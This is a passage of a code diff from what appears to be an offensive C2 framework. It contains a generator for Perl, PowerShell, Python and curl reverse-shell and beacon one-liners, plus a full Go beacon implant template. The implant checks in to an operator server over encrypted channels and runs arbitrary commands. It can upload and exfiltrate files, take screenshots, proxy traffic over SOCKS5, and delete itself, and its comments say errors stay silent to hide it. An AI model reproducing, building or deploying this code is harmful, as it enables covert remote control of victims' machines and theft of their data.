base64,sys;exec(base64.b64decode('%s').decode())"`, + b64StdEncode(py), + ), nil + + case OnelinerPerl: + if err := SafeBindPort(in.Port); err != nil { + return "", err + } + return fmt.Sprintf( + `perl -e 'use Socket;$i="%s";$p=%d;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'`, + host, in.Port, + ), nil + + case OnelinerPowerShell: + if err := SafeBindPort(in.Port); err != nil { + return "", err + } + // PowerShell TCP 反弹(不依赖 .NET old 版本) + ps := fmt.Sprintf( + `$c=New-Object System.Net.Sockets.TcpClient('%s',%d);$s=$c.GetStream();[byte[]]$b=0..65535|%%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|Out-String);$o2=$o+'PS '+(pwd).Path+'> ';$by=([text.encoding]::ASCII).GetBytes($o2);$s.Write($by,0,$by.Length);$s.Flush()};$c.Close()`, + host, in.Port, + ) + return fmt.Sprintf( + `powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand %s`, + utf16LEBase64(ps), + ), nil + + case OnelinerCurl: + if strings.TrimSpace(in.HTTPBaseURL) == "" { + return "", fmt.Errorf("http_base_url is required for curl_beacon") + } + if strings.TrimSpace(in.ImplantToken) == "" { + return "", fmt.Errorf("implant_token is required for curl_beacon") + } + base := strings.TrimRight(in.HTTPBaseURL, "/") + return fmt.Sprintf( + `bash -c 'H="X-Implant-Token: %s";`+ + `URL="%s";`+ + `HN=$(hostname 2>/dev/null||echo unknown);`+ + `UN=$(whoami 2>/dev/null||echo unknown);`+ + `OS=$(uname -s 2>/dev/null||echo unknown);`+ + `AR=$(uname -m 2>/dev/null||echo unknown);`+ + `IP=$(hostname -I 2>/dev/null|awk "{print \$1}"||echo "");`+ + `SID="";`+ + `while :;do `+ + `BODY="{\"hostname\":\"$HN\",\"username\":\"$UN\",\"os\":\"$OS\",\"arch\":\"$AR\",\"internal_ip\":\"$IP\",\"pid\":$$}";`+ + `R=$(curl -fsSk -H "$H" -H "Content-Type: application/json" -X POST "$URL/check_in" -d "$BODY" 2>/dev/null);`+ + `if [ -n "$R" ]&&[ -z "$SID" ];then SID=$(echo "$R"|grep -o "\"session_id\":\"[^\"]*\""|head -1|cut -d"\"" -f4);fi;`+ + `if [ -n "$SID" ];then `+ + `T=$(curl -fsSk -H "$H" -G "$URL/tasks?session_id=$SID" 2>/dev/null);`+ + `fi;`+ + `sleep 5;`+ + `done' &`, + in.ImplantToken, base, + ), nil + } + return "", fmt.Errorf("unsupported oneliner kind: %s", in.Kind) +} + +// urlEncodeForShell URL 编码字符串,避免特殊字符在 shell 中破坏转义 +func urlEncodeForShell(s string) string { + return url.QueryEscape(s) +} diff --git a/c2/payload_templates/beacon.go.tmpl b/c2/payload_templates/beacon.go.tmpl new file mode 100644 index 00000000..bfd3e998 --- /dev/null +++ b/c2/payload_templates/beacon.go.tmpl @@ -0,0 +1,1283 @@ +// Code generated by CyberStrikeAI C2 payload builder. DO NOT EDIT. +// 此文件由 internal/c2/payload_builder.go 在生成 beacon 时填充并交叉编译。 +// 占位符列表(构建时由 text/template 替换): +// {{.ServerURL}} e.g. http://1.2.3.4:8443 +// {{.ImplantToken}} HTTP header X-Implant-Token 值 +// {{.AESKeyB64}} 32-byte AES-256 base64 +// {{.SleepSeconds}} 默认心跳间隔 +// {{.JitterPercent}} 抖动百分比 0-100 +// {{.CheckInPath}} 默认 /check_in +// {{.TasksPath}} 默认 /tasks +// {{.ResultPath}} 默认 /result +// {{.UploadPath}} 默认 /upload +// {{.FilePath}} 默认 /file/ +// {{.UserAgent}} 默认 Mozilla/5.0 ... +// {{.Transport}} http | tcp(tcp 时使用 TCP 成帧协议 + 魔数 CSB1,与 tcp_reverse 监听器配套) +// {{.TCPDialAddr}} tcp 时回连地址 host:port;http 时为空 +// {{.TransportMetadata}} 写入 check-in metadata.transport(http_beacon | tcp_beacon 等) +// +// 设计要点: +// - 无第三方依赖(仅标准库),CGO_ENABLED=0 即可跨平台编译; +// - 所有与服务端的交互均使用 AES-256-GCM 加密; +// - 任务异步并发执行(每个任务一个 goroutine),不阻塞主心跳循环; +// - 出错静默:避免 stderr/stdout 暴露 beacon 存在,panic 统一 recover。 +package main + +import ( + "bytes" + "crypto/aes" + "crypto/cipher" + "crypto/rand" + "crypto/tls" + "encoding/base64" + "encoding/binary" + "encoding/json" + "fmt" + "io" + mrand "math/rand" + "net" + "net/http" + "os" + "os/exec" + "os/user" + "path/filepath" + "runtime" + "strings" + "sync" + "time" +) + +// 编译期注入常量(text/template 替换) +const ( + serverURL = "{{.ServerURL}}" + implantToken = "{{.ImplantToken}}" + aesKeyB64 = "{{.AESKeyB64}}" + defaultSleep = {{.SleepSeconds}} + defaultJitter = {{.JitterPercent}} + checkInPath = "{{.CheckInPath}}" + tasksPath = "{{.TasksPath}}" + resultPath = "{{.ResultPath}}" + uploadPath = "{{.UploadPath}}" + filePath = "{{.FilePath}}" + userAgent = "{{.UserAgent}}" + + beaconTransport = "{{.Transport}}" + tcpDialAddr = "{{.TCPDialAddr}}" + transportMetaConst = "{{.TransportMetadata}}" +) + +const tcpBeaconWireMax = 64 << 20 + +var ( + implantUUID string + sessionID string + currentSleep = defaultSleep + currentJit = defaultJitter + cwdMu sync.Mutex + currentCwd string + httpClient *http.Client + // tcpTaskConn 在 TCP Beacon 同步执行任务时指向当前连接,供 fetchC2File 拉取服务端文件。 + tcpTaskConn net.Conn +) + +// CheckInResp 与服务端 ImplantCheckInResponse 对齐 +type CheckInResp struct { + SessionID string `json:"session_id"` + NextSleep int `json:"next_sleep"` + NextJitter int `json:"next_jitter"` + HasTasks bool `json:"has_tasks"` + ServerTime int64 `json:"server_time"` +} + +// TaskEnv 与服务端 TaskEnvelope 对齐 +type TaskEnv struct { + TaskID string `json:"task_id"` + TaskType string `json:"task_type"` + Payload map[string]interface{} `json:"payload"` +} + +// TaskReport 与服务端 TaskResultReport 对齐 +type TaskReport struct { + TaskID string `json:"task_id"` + Success bool `json:"success"` + Output string `json:"output,omitempty"` + Error string `json:"error,omitempty"` + BlobBase64 string `json:"blob_b64,omitempty"` + BlobSuffix string `json:"blob_suffix,omitempty"` + StartedAt int64 `json:"started_at"` + EndedAt int64 `json:"ended_at"` +} + +func main() { + defer func() { _ = recover() }() + implantUUID = generateImplantUUID() + currentCwd, _ = os.Getwd() + + if beaconTransport == "tcp" { + runTCPBeaconForever() + return + } + + httpClient = &http.Client{ + Timeout: 60 * time.Second, + Transport: &http.Transport{ + DisableKeepAlives: true, + TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, + TLSHandshakeTimeout: 10 * time.Second, + }, + } + + for { + resp, err := checkIn() + if err == nil && resp != nil { + sessionID = resp.SessionID + if resp.NextSleep > 0 { + currentSleep = resp.NextSleep + } + if resp.NextJitter >= 0 { + currentJit = resp.NextJitter + } + if resp.HasTasks { + envs, err := fetchTasks() + if err == nil { + for _, env := range envs { + go handleTaskAsync(env) + } + } + } + } + time.Sleep(applyJitter(currentSleep, currentJit)) + } +} + +func runTCPBeaconForever() { + for { + conn, err := net.DialTimeout("tcp", tcpDialAddr, 45*time.Second) + if err != nil { + time.Sleep(applyJitter(currentSleep, currentJit)) + continue + } + func() { + defer conn.Close() + if _, err := io.WriteString(conn, "CSB1"); err != nil { + return + } + tcpBeaconSessionLoop(conn) + }() + time.Sleep(applyJitter(currentSleep, currentJit)) + } +} + +func tcpWriteFrame(conn net.Conn, enc string) error { + b := []byte(enc) + if len(b) == 0 || len(b) > tcpBeaconWireMax { + return fmt.Errorf("bad tcp frame") + } + var hdr [4]byte + binary.BigEndian.PutUint32(hdr[:], uint32(len(b))) + if _, err := conn.Write(hdr[:]); err != nil { + return err + } + _, err := conn.Write(b) + return err +} + +func tcpReadFrame(conn net.Conn) (string, error) { + var n uint32 + if err := binary.Read(conn, binary.BigEndian, &n); err != nil { + return "", err + } + if n == 0 || int64(n) > int64(tcpBeaconWireMax) { + return "", fmt.Errorf("bad tcp frame size") + } + buf := make([]byte, n) + if _, err := io.ReadFull(conn, buf); err != nil { + return "", err + } + return string(buf), nil +} + +func tcpRoundTrip(conn net.Conn, plainJSON []byte) ([]byte, error) { + enc, err := encryptGCM(plainJSON) + if err != nil { + return nil, err + } + if err := tcpWriteFrame(conn, enc); err != nil { + return nil, err + } + _ = conn.SetReadDeadline(time.Now().Add(6 * time.Minute)) + cipherB64, err := tcpReadFrame(conn) + if err != nil { + return nil, err + } + return decryptGCM(cipherB64) +} + +func tcpBeaconSessionLoop(conn net.Conn) { + for { + resp, err := tcpCheckIn(conn) + if err != nil || resp == nil { + return + } + sessionID = resp.SessionID + if resp.NextSleep > 0 { + currentSleep = resp.NextSleep + } + if resp.NextJitter >= 0 { + currentJit = resp.NextJitter + } + if resp.HasTasks { + envs, err := tcpFetchTasks(conn) + if err == nil { + for _, env := range envs { + handleTaskSyncTCP(conn, env) + } + } + } + _ = conn.SetReadDeadline(time.Time{}) + time.Sleep(applyJitter(currentSleep, currentJit)) + } +} + +func tcpCheckInJSONBody() ([]byte, error) { + checkObj := map[string]interface{}{ + "uuid": implantUUID, + "hostname": hostnameOrDefault(), + "username": currentUsername(), + "os": runtime.GOOS, + "arch": runtime.GOARCH, + "pid": os.Getpid(), + "process_name": filepath.Base(exeSelf()), + "is_admin": isAdminProcess(), + "internal_ip": firstInternalIP(), + "user_agent": userAgent, + "sleep_seconds": currentSleep, + "jitter_percent": currentJit, + "metadata": map[string]interface{}{ + "transport": transportMetaConst, + "cwd": currentCwd, + }, + } + rawCheck, err := json.Marshal(checkObj) + if err != nil { + return nil, err + } + wire := map[string]interface{}{ + "op": "check_in", + "token": implantToken, + "check": json.RawMessage(rawCheck), + } + return json.Marshal(wire) +} + +func tcpCheckIn(conn net.Conn) (*CheckInResp, error) { + body, err := tcpCheckInJSONBody() + if err != nil { + return nil, err + } + plain, err := tcpRoundTrip(conn, body) + if err != nil { + return nil, err + } + var r CheckInResp + if err := json.Unmarshal(plain, &r); err != nil { + return nil, err + } + return &r, nil +} + +func tcpFetchTasks(conn net.Conn) ([]TaskEnv, error) { + wire := map[string]interface{}{ + "op": "tasks", + "token": implantToken, + "session_id": sessionID, + } + body, _ := json.Marshal(wire) + plain, err := tcpRoundTrip(conn, body) + if err != nil { + return nil, err + } + var wrapper struct { + Tasks []TaskEnv `json:"tasks"` + } + if err := json.Unmarshal(plain, &wrapper); err != nil { + return nil, err + } + return wrapper.Tasks, nil +} + +func tcpReportResult(conn net.Conn, report TaskReport) { + repRaw, err := json.Marshal(report) + if err != nil { + return + } + wire := map[string]interface{}{ + "op": "result", + "token": implantToken, + "result": json.RawMessage(repRaw), + } + body, _ := json.Marshal(wire) + _, _ = tcpRoundTrip(conn, body) +} + +func handleTaskSyncTCP(conn net.Conn, env TaskEnv) { + defer func() { _ = recover() }() + tcpTaskConn = conn + defer func() { tcpTaskConn = nil }() + start := time.Now() + output, blobB64, blobSuffix, errMsg := executeTask(env.TaskType, env.Payload) + report := TaskReport{ + TaskID: env.TaskID, + Success: errMsg == "", + Output: output, + Error: errMsg, + BlobBase64: blobB64, + BlobSuffix: blobSuffix, + StartedAt: start.UnixMilli(), + EndedAt: time.Now().UnixMilli(), + } + tcpReportResult(conn, report) +} + +func tcpFetchEncryptedFile(conn net.Conn, fileID string) ([]byte, error) { + fr, _ := json.Marshal(map[string]string{"file_id": fileID}) + wire := map[string]interface{}{ + "op": "file", + "token": implantToken, + "file": json.RawMessage(fr), + } + body, err := json.Marshal(wire) + if err != nil { + return nil, err + } + plain, err := tcpRoundTrip(conn, body) + if err != nil { + return nil, err + } + var wrapper struct { + FileData string `json:"file_data"` + } + if err := json.Unmarshal(plain, &wrapper); err != nil { + return nil, err + } + return base64.StdEncoding.DecodeString(wrapper.FileData) +} + +func fetchC2FileByID(fileID string) ([]byte, error) { + if tcpTaskConn != nil { + return tcpFetchEncryptedFile(tcpTaskConn, fileID) + } + url := fmt.Sprintf("%s%s%s.bin", serverURL, filePath, fileID) + req, _ := http.NewRequest("GET", url, nil) + req.Header.Set("User-Agent", userAgent) + req.Header.Set("X-Implant-Token", implantToken) + resp, err := httpClient.Do(req) + if err != nil { + return nil, err + } + defer resp.Body.Close() + if resp.StatusCode != 200 { + return nil, fmt.Errorf("download failed: %d", resp.StatusCode) + } + raw, err := io.ReadAll(resp.Body) + if err != nil { + return nil, err + } + plain, err := decryptGCM(string(raw)) + if err != nil { + return nil, err + } + var wrapper struct { + FileData string `json:"file_data"` + } + if err := json.Unmarshal(plain, &wrapper); err != nil { + return nil, err + } + return base64.StdEncoding.DecodeString(wrapper.FileData) +} + +func generateImplantUUID() string { + host, _ := os.Hostname() + mac := firstMACAddr() + return fmt.Sprintf("%s-%s-%d", host, mac, os.Getpid()) +} + +func firstMACAddr() string { + ifs, err := net.Interfaces() + if err != nil { + return "000000000000" + } + for _, i := range ifs { + if i.Flags&net.FlagLoopback != 0 || len(i.HardwareAddr) == 0 { + continue + } + return strings.ReplaceAll(i.HardwareAddr.String(), ":", "") + } + return "000000000000" +} + +func firstInternalIP() string { + ifs, err := net.Interfaces() + if err != nil { + return "" + } + for _, i := range ifs { + if i.Flags&net.FlagLoopback != 0 || i.Flags&net.FlagUp == 0 { + continue + } + addrs, err := i.Addrs() + if err != nil { + continue + } + for _, a := range addrs { + ipnet, ok := a.(*net.IPNet) + if !ok || ipnet.IP.To4() == nil { + continue + } + return ipnet.IP.String() + } + } + return "" +} + +func currentUsername() string { + u, err := user.Current() + if err != nil || u == nil { + return "unknown" + } + return u.Username +} + +func isAdminProcess() bool { + if runtime.GOOS == "windows" { + _, err := os.Open(filepath.Join(os.Getenv("WINDIR"), "System32", "config", "SAM")) + return err == nil + } + return os.Geteuid() == 0 +} + +func hostnameOrDefault() string { + h, _ := os.Hostname() + if h == "" { + return "unknown" + } + return h +} + +func exeSelf() string { + ex, _ := os.Executable() + if ex == "" { + return "unknown" + } + return ex +} + +func applyJitter(baseSec, jitterPct int) time.Duration { + if baseSec <= 0 { + return 5 * time.Second + } + if jitterPct <= 0 { + return time.Duration(baseSec) * time.Second + } + if jitterPct > 100 { + jitterPct = 100 + } + delta := mrand.Intn(2*jitterPct+1) - jitterPct + factor := 1.0 + float64(delta)/100.0 + return time.Duration(float64(baseSec)*factor) * time.Second +} + +func checkIn() (*CheckInResp, error) { + payload := map[string]interface{}{ + "uuid": implantUUID, + "hostname": hostnameOrDefault(), + "username": currentUsername(), + "os": runtime.GOOS, + "arch": runtime.GOARCH, + "pid": os.Getpid(), + "process_name": filepath.Base(exeSelf()), + "is_admin": isAdminProcess(), + "internal_ip": firstInternalIP(), + "user_agent": userAgent, + "sleep_seconds": currentSleep, + "jitter_percent": currentJit, + "metadata": map[string]interface{}{ + "transport": transportMetaConst, + "cwd": currentCwd, + }, + } + body, _ := json.Marshal(payload) + enc, err := encryptGCM(body) + if err != nil { + return nil, err + } + req, _ := http.NewRequest("POST", serverURL+checkInPath, bytes.NewReader([]byte(enc))) + req.Header.Set("User-Agent", userAgent) + req.Header.Set("X-Implant-Token", implantToken) + resp, err := httpClient.Do(req) + if err != nil { + return nil, err + } + defer resp.Body.Close() + if resp.StatusCode != 200 { + return nil, fmt.Errorf("checkin status %d", resp.StatusCode) + } + raw, err := io.ReadAll(resp.Body) + if err != nil { + return nil, err + } + plain, err := decryptGCM(string(raw)) + if err != nil { + return nil, err + } + var r CheckInResp + if err := json.Unmarshal(plain, &r); err != nil { + return nil, err + } + return &r, nil +} + +func fetchTasks() ([]TaskEnv, error) { + url := fmt.Sprintf("%s%s?session_id=%s", serverURL, tasksPath, sessionID) + req, _ := http.NewRequest("GET", url, nil) + req.Header.Set("User-Agent", userAgent) + req.Header.Set("X-Implant-Token", implantToken) + resp, err := httpClient.Do(req) + if err != nil { + return nil, err + } + defer resp.Body.Close() + if resp.StatusCode != 200 { + return nil, fmt.Errorf("fetch tasks status %d", resp.StatusCode) + } + raw, err := io.ReadAll(resp.Body) + if err != nil { + return nil, err + } + plain, err := decryptGCM(string(raw)) + if err != nil { + return nil, err + } + var wrapper struct { + Tasks []TaskEnv `json:"tasks"` + } + if err := json.Unmarshal(plain, &wrapper); err != nil { + return nil, err + } + return wrapper.Tasks, nil +} + +func reportResult(report TaskReport) { + body, _ := json.Marshal(report) + enc, err := encryptGCM(body) + if err != nil { + return + } + req, _ := http.NewRequest("POST", serverURL+resultPath, bytes.NewReader([]byte(enc))) + req.Header.Set("User-Agent", userAgent) + req.Header.Set("X-Implant-Token", implantToken) + resp, err := httpClient.Do(req) + if err != nil { + return + } + defer resp.Body.Close() + _, _ = io.ReadAll(resp.Body) +} + +func getAESKey() ([]byte, error) { + return base64.StdEncoding.DecodeString(aesKeyB64) +} + +func encryptGCM(plaintext []byte) (string, error) { + key, err := getAESKey() + if err != nil { + return "", err + } + block, err := aes.NewCipher(key) + if err != nil { + return "", err + } + gcm, err := cipher.NewGCM(block) + if err != nil { + return "", err + } + nonce := make([]byte, gcm.NonceSize()) + if _, err := rand.Read(nonce); err != nil { + return "", err + } + ct := gcm.Seal(nil, nonce, plaintext, nil) + out := append(nonce, ct...) + return base64.StdEncoding.EncodeToString(out), nil +} + +func decryptGCM(cipherText string) ([]byte, error) { + key, err := getAESKey() + if err != nil { + return nil, err + } + raw, err := base64.StdEncoding.DecodeString(cipherText) + if err != nil { + return nil, err + } + block, err := aes.NewCipher(key) + if err != nil { + return nil, err + } + gcm, err := cipher.NewGCM(block) + if err != nil { + return nil, err + } + ns := gcm.NonceSize() + if len(raw) < ns+16 { + return nil, fmt.Errorf("ciphertext too short") + } + nonce, ct := raw[:ns], raw[ns:] + return gcm.Open(nil, nonce, ct, nil) +} + +func handleTaskAsync(env TaskEnv) { + defer func() { _ = recover() }() + start := time.Now() + output, blobB64, blobSuffix, errMsg := executeTask(env.TaskType, env.Payload) + report := TaskReport{ + TaskID: env.TaskID, + Success: errMsg == "", + Output: output, + Error: errMsg, + BlobBase64: blobB64, + BlobSuffix: blobSuffix, + StartedAt: start.UnixMilli(), + EndedAt: time.Now().UnixMilli(), + } + reportResult(report) +} + +func executeTask(taskType string, payload map[string]interface{}) (output, blobB64, blobSuffix, errMsg string) { + switch taskType { + case "exec": + return taskExec(payload) + case "shell": + return taskShell(payload) + case "pwd": + return taskPwd() + case "cd": + return taskCd(payload) + case "ls": + return taskLs(payload) + case "ps": + return taskPs() + case "kill_proc": + return taskKillProc(payload) + case "upload": + return taskUpload(payload) + case "download": + return taskDownload(payload) + case "screenshot": + return taskScreenshot() + case "sleep": + return taskSleep(payload) + case "port_fwd": + return taskPortForward(payload) + case "socks_start": + return taskSocksStart(payload) + case "socks_stop": + return taskSocksStop(payload) + case "load_assembly": + return taskLoadAssembly(payload) + case "persist": + return taskPersist(payload) + case "exit": + os.Exit(0) + return "", "", "", "" + case "self_delete": + return taskSelfDelete() + default: + return "", "", "", "unsupported task type: " + taskType + } +} + +func shellByOS() string { + if runtime.GOOS == "windows" { + return "cmd" + } + return "/bin/sh" +} + +func shellFlag() string { + if runtime.GOOS == "windows" { + return "/c" + } + return "-c" +} + +func runWithTimeout(cmdStr string, timeoutSec int) (string, error) { + if timeoutSec <= 0 { + timeoutSec = 60 + } + cmd := exec.Command(shellByOS(), shellFlag(), cmdStr) + cwdMu.Lock() + cmd.Dir = currentCwd + cwdMu.Unlock() + + done := make(chan struct { + out []byte + err error + }, 1) + go func() { + out, err := cmd.CombinedOutput() + done <- struct { + out []byte + err error + }{out, err} + }() + select { + case res := <-done: + return string(res.out), res.err + case <-time.After(time.Duration(timeoutSec) * time.Second): + _ = cmd.Process.Kill() + return "", fmt.Errorf("timeout") + } +} + +func getTimeoutFromPayload(payload map[string]interface{}) int { + to, _ := payload["timeout_seconds"].(float64) + if to <= 0 { + return 60 + } + return int(to) +} + +func taskExec(payload map[string]interface{}) (string, string, string, string) { + cmdStr, _ := payload["command"].(string) + if cmdStr == "" { + return "", "", "", "command is empty" + } + out, err := runWithTimeout(cmdStr, getTimeoutFromPayload(payload)) + if err != nil { + return out, "", "", err.Error() + } + return out, "", "", "" +} + +func taskShell(payload map[string]interface{}) (string, string, string, string) { + cmdStr, _ := payload["command"].(string) + if cmdStr == "" { + return "", "", "", "command is empty" + } + + // Append a pwd/cd probe to the command so we can capture the real cwd + // after the user's command runs (e.g. "cd /tmp && ls" → cwd becomes /tmp). + var probe string + if runtime.GOOS == "windows" { + probe = " && cd" + } else { + probe = " && pwd" + } + combined := cmdStr + probe + + out, err := runWithTimeout(combined, getTimeoutFromPayload(payload)) + + // The last line of output is the cwd from the probe command. + // Split it off so we don't return the probe output to the operator. + lines := strings.Split(strings.TrimRight(out, "\r\n"), "\n") + if len(lines) > 0 { + candidate := strings.TrimSpace(lines[len(lines)-1]) + if filepath.IsAbs(candidate) { + if info, statErr := os.Stat(candidate); statErr == nil && info.IsDir() { + cwdMu.Lock() + currentCwd = candidate + cwdMu.Unlock() + out = strings.Join(lines[:len(lines)-1], "\n") + } + } + } + + if err != nil { + return out, "", "", err.Error() + } + return out, "", "", "" +} + +func taskPwd() (string, string, string, string) { + cwdMu.Lock() + cwd := currentCwd + cwdMu.Unlock() + return cwd, "", "", "" +} + +func taskCd(payload map[string]interface{}) (string, string, string, string) { + path, _ := payload["path"].(string) + if path == "" { + return "", "", "", "path is empty" + } + cwdMu.Lock() + if !filepath.IsAbs(path) { + path = filepath.Join(currentCwd, path) + } + cwdMu.Unlock() + abs, err := filepath.Abs(path) + if err != nil { + return "", "", "", err.Error() + } + info, err := os.Stat(abs) + if err != nil { + return "", "", "", err.Error() + } + if !info.IsDir() { + return "", "", "", "not a directory" + } + cwdMu.Lock() + currentCwd = abs + cwdMu.Unlock() + return abs, "", "", "" +} + +func taskLs(payload map[string]interface{}) (string, string, string, string) { + path, _ := payload["path"].(string) + if path == "" { + path = "." + } + cwdMu.Lock() + if !filepath.IsAbs(path) { + path = filepath.Join(currentCwd, path) + } + cwdMu.Unlock() + entries, err := os.ReadDir(path) + if err != nil { + return "", "", "", err.Error() + } + var lines []string + for _, e := range entries { + info, _ := e.Info() + if info != nil { + lines = append(lines, fmt.Sprintf("%s\t%s\t%d\t%s", + e.Type().String(), info.Mode().String(), info.Size(), e.Name())) + } else { + lines = append(lines, e.Name()) + } + } + return strings.Join(lines, "\n"), "", "", "" +} + +func taskPs() (string, string, string, string) { + if runtime.GOOS == "windows" { + out, err := runWithTimeout("tasklist", 30) + if err != nil { + return out, "", "", err.Error() + } + return out, "", "", "" + } + out, err := runWithTimeout("ps aux", 30) + if err != nil { + return out, "", "", err.Error() + } + return out, "", "", "" +} + +func taskKillProc(payload map[string]interface{}) (string, string, string, string) { + pidFloat, _ := payload["pid"].(float64) + pid := int(pidFloat) + if pid <= 0 { + return "", "", "", "invalid pid" + } + proc, err := os.FindProcess(pid) + if err != nil { + return "", "", "", err.Error() + } + if err := proc.Kill(); err != nil { + return "", "", "", err.Error() + } + return "killed", "", "", "" +} + +func taskUpload(payload map[string]interface{}) (string, string, string, string) { + remotePath, _ := payload["remote_path"].(string) + fileID, _ := payload["file_id"].(string) + if remotePath == "" || fileID == "" { + return "", "", "", "remote_path or file_id empty" + } + data, err := fetchC2FileByID(fileID) + if err != nil { + return "", "", "", err.Error() + } + if err := os.WriteFile(remotePath, data, 0644); err != nil { + return "", "", "", err.Error() + } + return fmt.Sprintf("uploaded %d bytes to %s", len(data), remotePath), "", "", "" +} + +func taskDownload(payload map[string]interface{}) (string, string, string, string) { + remotePath, _ := payload["remote_path"].(string) + if remotePath == "" { + return "", "", "", "remote_path empty" + } + data, err := os.ReadFile(remotePath) + if err != nil { + return "", "", "", err.Error() + } + // File data goes through the standard encrypted result channel via blob_b64 + b64 := base64.StdEncoding.EncodeToString(data) + suffix := filepath.Ext(remotePath) + return fmt.Sprintf("downloaded %d bytes from %s", len(data), remotePath), b64, suffix, "" +} + +func taskScreenshot() (string, string, string, string) { + var b64Out string + var err error + switch runtime.GOOS { + case "darwin": + b64Out, err = runWithTimeout("screencapture -x /tmp/.cs_ss.png && base64 /tmp/.cs_ss.png && rm -f /tmp/.cs_ss.png", 30) + case "linux": + b64Out, err = runWithTimeout("import -window root /tmp/.cs_ss.png 2>/dev/null && base64 /tmp/.cs_ss.png && rm -f /tmp/.cs_ss.png", 30) + case "windows": + ps := `Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $b=New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); $g=[System.Drawing.Graphics]::FromImage($b); $g.CopyFromScreen([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Location,[System.Drawing.Point]::Empty,$b.Size); $m=New-Object IO.MemoryStream; $b.Save($m,[System.Drawing.Imaging.ImageFormat]::Png); [Convert]::ToBase64String($m.ToArray())` + b64Out, err = runWithTimeout(fmt.Sprintf("powershell -NoProfile -NonInteractive -Command \"%s\"", ps), 30) + default: + return "", "", "", "screenshot not supported on " + runtime.GOOS + } + if err != nil { + return "", "", "", err.Error() + } + b64Out = strings.TrimSpace(b64Out) + return "screenshot captured", b64Out, ".png", "" +} + +func taskSleep(payload map[string]interface{}) (string, string, string, string) { + s, _ := payload["seconds"].(float64) + j, _ := payload["jitter"].(float64) + currentSleep = int(s) + currentJit = int(j) + return fmt.Sprintf("sleep set to %ds (jitter %d%%)", currentSleep, currentJit), "", "", "" +} + +func taskSelfDelete() (string, string, string, string) { + exe := exeSelf() + if exe == "" || exe == "unknown" { + return "", "", "", "cannot determine self path" + } + go func() { + time.Sleep(2 * time.Second) + os.Remove(exe) + }() + os.Exit(0) + return "", "", "", "" +} + +// --- Port Forward --- + +var ( + portFwdMu sync.Mutex + portFwdConns = make(map[string]net.Listener) +) + +func taskPortForward(payload map[string]interface{}) (string, string, string, string) { + action, _ := payload["action"].(string) + localPort := int(getFloat(payload, "local_port")) + remoteHost, _ := payload["remote_host"].(string) + remotePort := int(getFloat(payload, "remote_port")) + + if action == "stop" { + key := fmt.Sprintf("%d", localPort) + portFwdMu.Lock() + if ln, ok := portFwdConns[key]; ok { + ln.Close() + delete(portFwdConns, key) + } + portFwdMu.Unlock() + return fmt.Sprintf("port forward on :%d stopped", localPort), "", "", "" + } + + if localPort <= 0 || remoteHost == "" || remotePort <= 0 { + return "", "", "", "local_port, remote_host, remote_port required" + } + + ln, err := net.Listen("tcp", fmt.Sprintf("127.0.0.1:%d", localPort)) + if err != nil { + return "", "", "", err.Error() + } + key := fmt.Sprintf("%d", localPort) + portFwdMu.Lock() + portFwdConns[key] = ln + portFwdMu.Unlock() + + go func() { + for { + conn, err := ln.Accept() + if err != nil { + return + } + go func(c net.Conn) { + defer c.Close() + remote, err := net.DialTimeout("tcp", fmt.Sprintf("%s:%d", remoteHost, remotePort), 10*time.Second) + if err != nil { + return + } + defer remote.Close() + done := make(chan struct{}, 2) + go func() { io.Copy(remote, c); done <- struct{}{} }() + go func() { io.Copy(c, remote); done <- struct{}{} }() + <-done + }(conn) + } + }() + return fmt.Sprintf("port forward 127.0.0.1:%d -> %s:%d started", localPort, remoteHost, remotePort), "", "", "" +} + +// --- SOCKS5 Proxy --- + +var ( + socksMu sync.Mutex + socksListener net.Listener +) + +func taskSocksStart(payload map[string]interface{}) (string, string, string, string) { + port := int(getFloat(payload, "port")) + if port <= 0 { + port = 1080 + } + + socksMu.Lock() + if socksListener != nil { + socksMu.Unlock() + return "", "", "", "socks proxy already running" + } + socksMu.Unlock() + + ln, err := net.Listen("tcp", fmt.Sprintf("127.0.0.1:%d", port)) + if err != nil { + return "", "", "", err.Error() + } + socksMu.Lock() + socksListener = ln + socksMu.Unlock() + + go func() { + for { + conn, err := ln.Accept() + if err != nil { + return + } + go handleSocks5(conn) + } + }() + return fmt.Sprintf("SOCKS5 proxy started on 127.0.0.1:%d", port), "", "", "" +} + +func taskSocksStop(payload map[string]interface{}) (string, string, string, string) { + socksMu.Lock() + if socksListener != nil { + socksListener.Close() + socksListener = nil + } + socksMu.Unlock() + return "SOCKS5 proxy stopped", "", "", "" +} + +func handleSocks5(conn net.Conn) { + defer conn.Close() + buf := make([]byte, 258) + // Auth negotiation + n, err := conn.Read(buf) + if err != nil || n < 3 || buf[0] != 0x05 { + return + } + conn.Write([]byte{0x05, 0x00}) // no auth + + // Request + n, err = conn.Read(buf) + if err != nil || n < 7 || buf[0] != 0x05 || buf[1] != 0x01 { + conn.Write([]byte{0x05, 0x07, 0x00, 0x01, 0, 0, 0, 0, 0, 0}) + return + } + + var target string + switch buf[3] { + case 0x01: // IPv4 + if n < 10 { + return + } + target = fmt.Sprintf("%d.%d.%d.%d:%d", buf[4], buf[5], buf[6], buf[7], + int(buf[8])<<8|int(buf[9])) + case 0x03: // Domain + domainLen := int(buf[4]) + if n < 5+domainLen+2 { + return + } + domain := string(buf[5 : 5+domainLen]) + port := int(buf[5+domainLen])<<8 | int(buf[5+domainLen+1]) + target = fmt.Sprintf("%s:%d", domain, port) + case 0x04: // IPv6 + if n < 22 { + return + } + ip := net.IP(buf[4:20]) + port := int(buf[20])<<8 | int(buf[21]) + target = fmt.Sprintf("[%s]:%d", ip.String(), port) + default: + conn.Write([]byte{0x05, 0x08, 0x00, 0x01, 0, 0, 0, 0, 0, 0}) + return + } + + remote, err := net.DialTimeout("tcp", target, 10*time.Second) + if err != nil { + conn.Write([]byte{0x05, 0x05, 0x00, 0x01, 0, 0, 0, 0, 0, 0}) + return + } + defer remote.Close() 